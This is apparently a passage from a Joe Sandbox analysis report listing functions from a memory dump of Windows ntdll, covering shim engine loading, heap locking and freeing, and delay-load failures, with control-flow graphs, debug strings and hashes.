                                                                          • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                          • API String ID: 3446177414-2196497285
                                                                          • Opcode ID: d99271b5b78f2688e2b051f6502aeadb60bc3e42085865c61d1a118ae4ab71df
                                                                          • Instruction ID: 36a4b3344a43c2ee62df9bd4aa8167a982f75371b028b6494c4e8ab7a05690e9
                                                                          • Opcode Fuzzy Hash: d99271b5b78f2688e2b051f6502aeadb60bc3e42085865c61d1a118ae4ab71df
                                                                          • Instruction Fuzzy Hash: 87E1C2B4A0C342CFE710CF14C880B5AB7F5BF89354F414A6DE9A58B682D772E845CB92
                                                                          Function 356D640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1570 356d640d-356d646c call 356d6c11 1573 35739770-35739779 1570->1573 1574 356d6472-356d649e call 356fe8a6 call 356d6b45 1570->1574 1575 357397b3-357397b6 1573->1575 1576 3573977b-3573978d 1573->1576 1591 356d64a4-356d64a6 1574->1591 1592 357397e9-357397f2 call 3570e7e0 1574->1592 1579 357397dd 1575->1579 1578 357397a0-357397b0 call 3575e692 1576->1578 1578->1575 1582 357397e3-357397e4 1579->1582 1583 356d6542-356d654a 1579->1583 1582->1583 1586 35739827-3573982b call 356dba80 1583->1586 1587 356d6550-356d6564 call 35724b50 1583->1587 1593 35739830 1586->1593 1596 356d64ac-356d64d8 call 35717df6 call 356fd3e1 call 356d6868 1591->1596 1597 357397f7-357397fe 1591->1597 1592->1597 1593->1593 1610 35739802-3573980b 1596->1610 1611 356d64de-356d6526 RtlDebugPrintTimes 1596->1611 1599 35739800 call 3575e692 1597->1599 1600 357397db 1597->1600 1599->1600 1600->1579 1610->1575 1612 3573980d 1610->1612 1611->1583 1615 356d6528-356d653c call 356d6565 1611->1615 1612->1578 1615->1583 1618 3573980f-35739822 GetPEB call 356f3bc0 1615->1618 1618->1583
                                                                          APIs
                                                                          • RtlDebugPrintTimes.NTDLL ref: 356D651C
                                                                            • Part of subcall function 356D6565: RtlDebugPrintTimes.NTDLL ref: 356D6614
                                                                            • Part of subcall function 356D6565: RtlDebugPrintTimes.NTDLL ref: 356D665F
                                                                          Strings
                                                                          • apphelp.dll, xrefs: 356D6446
                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 357397B9
                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 35739790
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 357397A0, 357397C9
                                                                          • LdrpInitShimEngine, xrefs: 35739783, 35739796, 357397BF
                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3573977C
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 3446177414-204845295
                                                                          • Opcode ID: 1d0add0fed2e45e873c6ac4a6330ee0df8f5c62ab2d91b572ac750387daf044a
                                                                          • Instruction ID: 49fe05794db1e27611b2cba55f25140f93b1bf549e30d64236353613aba73669
                                                                          • Opcode Fuzzy Hash: 1d0add0fed2e45e873c6ac4a6330ee0df8f5c62ab2d91b572ac750387daf044a
                                                                          • Instruction Fuzzy Hash: 4C51D0716093049FE310DF20D891E9BBBF5FB847A4F400959F9899B2A1DB70D945CBD2
                                                                          Function 3575FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1621 3575fa02-3575fa3a call 3575f899 1624 3575fa3c-3575fa40 1621->1624 1625 3575fa7a-3575fa7c 1621->1625 1628 3575fa47-3575fa77 call 3575e692 1624->1628 1629 3575fa42 1624->1629 1626 3575fa7f-3575fa81 1625->1626 1627 3575fa7e 1625->1627 1630 3575fa83-3575fa8d 1626->1630 1631 3575fa99 1626->1631 1627->1626 1628->1625 1629->1628 1634 3575fa8f-3575fa93 1630->1634 1635 3575fa9b 1630->1635 1631->1635 1634->1635 1636 3575fa95-3575fa97 1634->1636 1637 3575fa9d-3575faa2 1635->1637 1636->1637 1638 3575faa4-3575faa6 1637->1638 1639 3575fb01-3575fb06 1637->1639 1638->1639 1642 3575faa8-3575fad4 call 35716010 1638->1642 1640 3575fb1f-3575fb25 1639->1640 1641 3575fb08-3575fb0a 1639->1641 1643 3575fb0c 1641->1643 1644 3575fb0f-3575fb1d RtlDebugPrintTimes 1641->1644 1648 3575fad6-3575fae0 1642->1648 1649 3575fae2-3575fae8 1642->1649 1643->1644 1644->1640 1650 3575faeb-3575faff RtlDebugPrintTimes 1648->1650 1649->1650 1650->1639 1650->1640
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                          • API String ID: 3446177414-4227709934
                                                                          • Opcode ID: b42512f511360eaec4ca6d81cd1400d20a5db08a128b8310c88e20225bb385fc
                                                                          • Instruction ID: 3d173da20a0ca6c25e21a640261df7c5384012eb06b360a074e1b6347659d257
                                                                          • Opcode Fuzzy Hash: b42512f511360eaec4ca6d81cd1400d20a5db08a128b8310c88e20225bb385fc
                                                                          • Instruction Fuzzy Hash: 6C415DB9E01209ABDB01DF94C984ADEBBB6FF48364F100569E905AB340D7719A02CB90
                                                                          Function 3578F8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                          • API String ID: 3446177414-3492000579
                                                                          • Opcode ID: cce7afba8b866afb4dad391390edb8455a91adad3c941892ba1aa74a76c4207e
                                                                          • Instruction ID: 90c5dd4295083c93b2bbf54af965f9f334aef1b7410a646fb1e63ab863f1abd8
                                                                          • Opcode Fuzzy Hash: cce7afba8b866afb4dad391390edb8455a91adad3c941892ba1aa74a76c4207e
                                                                          • Instruction Fuzzy Hash: 96712035A15684DFCB01CFA8D491AADFBF2FF89360F08809AE441AF251CB719A42CF54
                                                                          Function 356D6565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35739885
                                                                          • LdrpLoadShimEngine, xrefs: 3573984A, 3573988B
                                                                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35739843
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 35739854, 35739895
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 3446177414-3589223738
                                                                          • Opcode ID: 6e5ccd6c1dc8ae10bb9cad7c3c555bb2b15db2d1bbd96e8e8095592ed6045873
                                                                          • Instruction ID: 01fb0b11a68fcd24efcc334e1d32c03fcabea7fcd9aece449a402a0828d08f57
                                                                          • Opcode Fuzzy Hash: 6e5ccd6c1dc8ae10bb9cad7c3c555bb2b15db2d1bbd96e8e8095592ed6045873
                                                                          • Instruction Fuzzy Hash: 53510236B103589FDB14EBA8C899E9DB7F6BB40364F040565E842BF295CB71AC81CBD1
                                                                          Function 3570DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                          • API String ID: 3446177414-3224558752
                                                                          • Opcode ID: 22806f554ad31d5519eaee8396c392a6368e8bf1b91fb89cdbe85fff326d12d4
                                                                          • Instruction ID: 9e0e2b81faeca42a3920564a5c73cab627f54209735e6ae0162d5ab96559b437
                                                                          • Opcode Fuzzy Hash: 22806f554ad31d5519eaee8396c392a6368e8bf1b91fb89cdbe85fff326d12d4
                                                                          • Instruction Fuzzy Hash: 6341E2B5614750DFE711CB28C884B6AB3F6FF41364F094569E4059F381CB78A982CF91
                                                                          Function 3570DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                          • API String ID: 3446177414-1222099010
                                                                          • Opcode ID: 4c55911c4679376b28074ee4b61f56fa09d8d0801e634f395572575bdac5a6ea
                                                                          • Instruction ID: 27c776ff8840321ebea9fc1ccd00907d34684bff9b6237458bbf5e2ed3534e43
                                                                          • Opcode Fuzzy Hash: 4c55911c4679376b28074ee4b61f56fa09d8d0801e634f395572575bdac5a6ea
                                                                          • Instruction Fuzzy Hash: 4E3121B52157C49FEB22DB25C848FA9B7FAFF01760F060889E4025F7A1CBA5A941CF11
                                                                          Function 356E9046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $$@
                                                                          • API String ID: 3446177414-1194432280
                                                                          • Opcode ID: bb2afecab43f6c068a87d783f55d2d81f20b383c04a584046d6a404c6029b486
                                                                          • Instruction ID: de213b994c56557e171c684fcafe76ec0bb354d019585337343e618a07c65098
                                                                          • Opcode Fuzzy Hash: bb2afecab43f6c068a87d783f55d2d81f20b383c04a584046d6a404c6029b486
                                                                          • Instruction Fuzzy Hash: FA813AB1D012699BDB22CF54CD44BDEB7B8AF08750F0041EAE909BB250D7709E85CFA5
                                                                          Function 356DF8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 3446177414-3610490719
                                                                          • Opcode ID: 988bc796bd9aaeafc90f3bd1fce33e5607e9cd83c815746219e6c7ed738ca911
                                                                          • Instruction ID: 319e44d01da8d364826cf2e7585fcf7628e8b4630833b2612192df47d6543d03
                                                                          • Opcode Fuzzy Hash: 988bc796bd9aaeafc90f3bd1fce33e5607e9cd83c815746219e6c7ed738ca911
                                                                          • Instruction Fuzzy Hash: 3A910E71B19741EFE315CB24C8A5B2AF7EABF84650F040859F8459F682EF74E841CB92
                                                                          Function 35765B90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Wow64 Emulation Layer
                                                                          • API String ID: 3446177414-921169906
                                                                          • Opcode ID: bcc520333c401984a3644f674fa0fcc2af1dbe5beb9c63a7b75960b0cf604beb
                                                                          • Instruction ID: 6e26523ae136bd88fb0a7a1b03b859dc157c55c323c2e287b94cf7c6a7944154
                                                                          • Opcode Fuzzy Hash: bcc520333c401984a3644f674fa0fcc2af1dbe5beb9c63a7b75960b0cf604beb
                                                                          • Instruction Fuzzy Hash: B7212C75A0515EBFAF019AA1CD84CFFBB7DEF842D9F400054FE01A6100DA319E05EB64
                                                                          Function 35717A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                          • String ID:
                                                                          • API String ID: 4281723722-0
                                                                          • Opcode ID: 367ed6296611e6a04b0f4b00b46e80e57751798100cd2d3d6ff9bc04f03aa399
                                                                          • Instruction ID: fc9916f7b934edb10d2d5d6d76f5d1956ea62583cff9d302728bdd7f54ead3f5
                                                                          • Opcode Fuzzy Hash: 367ed6296611e6a04b0f4b00b46e80e57751798100cd2d3d6ff9bc04f03aa399
                                                                          • Instruction Fuzzy Hash: 8C313675E11218DFCF15DFA9E848A9DBBF1FB48320F10452AE411BB280DB356901CF90
                                                                          Function 356E58E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          • Opcode ID: d69d8e63c40260baa9cfd28d7a3e632107b5e696cc085e69a475651820609ebb
                                                                          • Instruction ID: 98f6d4e5ccb47c9e8e48b741d5bc9fd5241f01a8ee3446ca650ebf24e976e804
                                                                          • Opcode Fuzzy Hash: d69d8e63c40260baa9cfd28d7a3e632107b5e696cc085e69a475651820609ebb
                                                                          • Instruction Fuzzy Hash: 5C3258B4E06369CFEB21CF64CA54BDDBBB1BB18304F0041E9D449AB641EBB55A84CF91
                                                                          Function 356E0485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 356E0586
                                                                          • kLsE, xrefs: 356E05FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                          • API String ID: 3446177414-2547482624
                                                                          • Opcode ID: 7d9561e6c733af8ae9c32e9d0b1fdab4648d15d30fbfbdf03eb634ba3ede5405
                                                                          • Instruction ID: 246e454e037c5c93fd628f0829ad76594e5b6993a124fe85785f2b2de2f1901a
                                                                          • Opcode Fuzzy Hash: 7d9561e6c733af8ae9c32e9d0b1fdab4648d15d30fbfbdf03eb634ba3ede5405
                                                                          • Instruction Fuzzy Hash: 595101B5A13B06DFEB20DFA4C6446ABB3F4BF04320F00443ED5969B640EB709546CBA2
                                                                          Function 356DDF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: 0$0
                                                                          • API String ID: 3446177414-203156872
                                                                          • Opcode ID: cda8a75b1d0639a91a6f728b5fa59fb1523059f9b0a9aba932943ec087ce31d8
                                                                          • Instruction ID: 52622e8938c1ad9e57ee47ce6d8603161d97f143786e60cd06e4c3b24e360b4c
                                                                          • Opcode Fuzzy Hash: cda8a75b1d0639a91a6f728b5fa59fb1523059f9b0a9aba932943ec087ce31d8
                                                                          • Instruction Fuzzy Hash: 3E416AB1A08701EFD300CF28C444A5AFBE5BB88354F054A2EF988DB701D771EA05CB86